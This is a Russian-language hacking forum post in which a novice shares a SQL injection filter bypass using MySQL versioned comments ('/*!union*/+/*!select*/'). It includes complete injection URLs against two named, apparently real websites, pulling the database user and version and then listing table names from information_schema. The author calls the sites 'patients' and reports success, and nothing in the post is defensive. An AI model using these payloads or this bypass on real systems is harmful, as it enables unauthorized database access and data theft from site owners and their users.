18.01.2012, 02:49
|
|
Новичок
Регистрация: 05.01.2012
Сообщений: 12
Провел на форуме:
3622
Репутация:
0
|
|
спасибо за разъяснение, теперь буду знать выходит такая ошибка значит фильтруют что то
из твоего кода снова ничего не понял, но нашёл более простое решение обхода фильтра
"/*!union*/+/*!select*/"
на двух пациентах проканало, больше не встречалось таких
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]avmaniacs[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]com[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]review[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]=-[/COLOR][COLOR="#0000BB"]319[/COLOR][COLOR="#FF8000"]/*!union*/[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#FF8000"]/*!select*/[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"](),[/COLOR][COLOR="#0000BB"]version[/COLOR][COLOR="#007700"](),[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]6[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]7[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]9[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]11[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]14[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]15[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]16[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]17[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]18[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]19[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]20[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]21[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]22[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]23[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]24[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]25[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]26[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]27[/COLOR][COLOR="#007700"]--
[/COLOR][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ceripp[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]it[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]curriculum[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]=-[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#FF8000"]/*!union*/[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#FF8000"]/*!select*/[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"](),[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]version[/COLOR][COLOR="#007700"](),[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]6[/COLOR][COLOR="#007700"]--
[/COLOR][/COLOR]
---------------------
хрен там что оказывается
получилось только узнать версию и юзера, начал узнавать table_name как тут же меня обламали с ошибками на несуществующую страницу...
------------
оказывается не всё так плохо как я думал
сделав запрос вот такого вида
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ceripp[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]it[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]curriculum[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]=-[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#FF8000"]/*!union*/[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#FF8000"]/*!select*/[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#FF8000"]/*!table_name*/[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]6[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#FF8000"]/*!from*/[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#FF8000"]/*!information_schema.tables*/[/COLOR][COLOR="#007700"]--[/COLOR][/COLOR]
я получил то что хотел |
|
|